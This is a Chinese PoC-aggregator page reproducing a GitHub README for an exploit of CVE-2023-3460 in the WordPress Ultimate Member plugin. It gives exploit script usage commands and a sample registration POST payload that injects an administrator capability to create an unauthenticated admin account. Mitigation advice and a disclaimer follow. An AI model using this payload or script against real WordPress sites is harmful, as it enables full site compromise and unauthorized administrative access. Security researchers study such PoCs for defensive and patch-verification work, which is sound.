POC详情: 9c7688bdcce13920444eaf4102ee24f068dcaf1c

来源
https://github.com/GURJOTEXPERT/CVE-2023-3460
关联漏洞
标题: WordPress Plugin Ultimate Member 权限许可和访问控制问题漏洞 (CVE-2023-3460)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress Plugin Ultimate Member 2.6.6之前版本存在权限许可和访问控制问题漏洞,该漏洞源于通过任意用户元更新可以升级权限。
介绍

# 🚨 CVE-2023-3460 - WordPress Ultimate Member Privilege Escalation Exploit

This is a proof-of-concept (PoC) exploit for [CVE-2023-3460](https://nvd.nist.gov/vuln/detail/CVE-2023-3460), a critical vulnerability in the WordPress plugin **Ultimate Member**. It allows **unauthenticated users** to escalate their privileges to **Administrator** by crafting a malicious registration request.

> 🔥 **Impact:** Full site compromise through unauthorized admin account creation.

---

## 📌 Vulnerability Details

- **Plugin Affected:** Ultimate Member
- **Affected Versions:** ≤ 2.6.6
- **Fixed Version:** 2.6.7
- **Exploit Type:** Privilege Escalation via Registration Abuse
- **Authentication Required:** ❌ No
- **CVE:** [CVE-2023-3460](https://nvd.nist.gov/vuln/detail/CVE-2023-3460)

---

## ⚙️ Requirements

- Python 3
- `requests` library

Install requirements:

```bash
pip3 install requests
```

---

## 🧪 Exploit Usage

```bash
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> -e <EMAIL>
```

### ✅ Example:

```bash
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 -e pwn@evil.com
```

---

## 📥 Exploit Script Features

- Fetches CSRF nonce (`_wpnonce`) from the register page
- Bypasses form validation
- Injects `wp_capabilities` with `administrator` role
- Creates a new admin user without authentication

---

## 🔐 Sample Exploit Payload

```http
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
user_email=pwn@evil.com&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
```

---

## 🛡️ Mitigation

- Update Ultimate Member plugin to **v2.6.7** or above
- Disable open registration if not required
- Monitor user creation logs for suspicious activity

---

## 📚 References

- 🔗 [Patchstack Advisory](https://patchstack.com/database/vulnerability/ultimate-member/wordpress-ultimate-member-plugin-2-6-6-authenticated-privilege-escalation-vulnerability)
- 🔗 [CVE-2023-3460 on NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-3460)

---

## ⚠️ Disclaimer

This script is provided for **educational and authorized testing purposes only**. Unauthorized exploitation of systems is illegal and unethical. Use it **only** on systems you own or have permission to test.

---

## 👨‍💻 Author

- 💀 [GURJOT SINGH]
- 🔒 [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
文件快照

 [4.0K]  /data/pocs/9c7688bdcce13920444eaf4102ee24f068dcaf1c
├── [3.5K]  CVE-2023-3460.py
└── [2.4K]  README.md

0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。